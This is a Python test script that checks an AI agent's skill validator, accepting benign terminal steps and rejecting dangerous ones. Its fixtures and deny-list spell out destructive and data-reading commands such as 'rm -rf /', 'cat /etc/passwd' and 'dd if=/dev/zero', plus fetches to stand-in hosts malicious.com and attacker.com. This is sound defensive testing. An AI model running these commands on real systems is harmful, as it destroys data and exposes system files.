
#!/usr/bin/env python3
"""
Test script that verifies the security fix for skill content validation.
It exercises the validation method directly, without any database dependencies.
"""
import sys
import os
# Put the sibling "harnessed_agent" directory first on sys.path so that
# `from core import HermesAgent` below resolves to the project's own module
# ahead of any installed package that happens to be named `core`.
# NOTE(review): the path is <this file's directory>/harnessed_agent — confirm
# that is where core.py lives, since this file itself appears to sit in a
# directory of that name.
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'harnessed_agent'))
from core import HermesAgent
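def _skill_document(name, description, steps):
    """Build a minimal skill document in the layout these tests feed to the validator.

    Args:
        name: value for the ``name`` field.
        description: value for the ``description`` field.
        steps: step lines, each emitted verbatim as a ``- `` list item.

    Returns:
        The document text, starting and ending with a newline, with the
        fixed fields ``version: 1.0.0`` and ``steps:`` between the header
        fields and the step list.
    """
    lines = [
        f"name: {name}",
        f"description: {description}",
        "version: 1.0.0",
        "steps:",
    ]
    # Steps are interpolated untouched so that trailing whitespace in a
    # fragment such as "sudo " survives into the document.
    lines.extend(f"- {step}" for step in steps)
    return "\n" + "\n".join(lines) + "\n"


def test_security_fix():
    """Check that HermesAgent._validate_skill_content accepts benign skills and rejects dangerous ones.

    Five cases run in order: a well-formed skill is accepted; a skill whose
    steps run destructive shell commands is rejected; empty content is
    rejected; each fragment in a short deny-list is rejected when it appears
    in a step; and each command in a short allow-list is accepted. The
    validator is expected to return a real ``bool``, so the assertions use
    identity checks and a truthy non-bool return is reported as a failure.

    Raises:
        AssertionError: on the first case whose result differs from the
            expected value.
    """
    agent = HermesAgent()

    # Test 1: a valid skill must be accepted.
    valid_content = _skill_document(
        "test-skill",
        "A valid test skill",
        ['Use terminal to run echo "hello"', "Return success"],
    )
    result = agent._validate_skill_content(valid_content)
    print(f"Valid skill validation result: {result}")
    assert result is True, "Valid skill should be accepted"

    # Test 2: a skill with destructive commands in its steps must be rejected.
    malicious_content = _skill_document(
        "malicious-skill",
        "A malicious skill",
        [
            "Use terminal to run rm -rf / # This should be blocked",
            "Use terminal to run cat /etc/passwd # This should be blocked",
        ],
    )
    result = agent._validate_skill_content(malicious_content)
    print(f"Malicious skill validation result: {result}")
    assert result is False, "Malicious skill should be rejected"

    # Test 3: empty content must be rejected rather than treated as
    # "nothing to block".
    result = agent._validate_skill_content("")
    print(f"Empty skill validation result: {result}")
    assert result is False, "Empty skill should be rejected"

    # Test 4: each deny-listed fragment must be rejected on its own.
    # Passing here shows these specific strings are caught; it says nothing
    # about fragments that are not on this list.
    dangerous_patterns = [
        "rm -rf /",
        "cat /etc/passwd",
        "wget http://malicious.com",
        "curl http://attacker.com",
        "sudo ",
        "chmod 777",
        "dd if=/dev/zero",
    ]
    for pattern in dangerous_patterns:
        dangerous_content = _skill_document(
            "dangerous-skill", "A dangerous skill", [f"Use terminal to run {pattern}"]
        )
        result = agent._validate_skill_content(dangerous_content)
        print(f"Dangerous pattern '{pattern}' validation result: {result}")
        assert result is False, f"Dangerous pattern '{pattern}' should be rejected"

    # Test 5: harmless commands must not trip the deny-list (no false positives).
    safe_patterns = ["echo hello", "ls -la", "pwd", "date", "whoami"]
    for pattern in safe_patterns:
        safe_content = _skill_document(
            "safe-skill", "A safe skill", [f"Use terminal to run {pattern}"]
        )
        result = agent._validate_skill_content(safe_content)
        print(f"Safe pattern '{pattern}' validation result: {result}")
        assert result is True, f"Safe pattern '{pattern}' should be accepted"

    print("All security tests passed!")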
# Script entry point: the first failing case raises AssertionError, which
# ends the run with a traceback and a non-zero exit status.
if __name__ == "__main__":
    test_security_fix()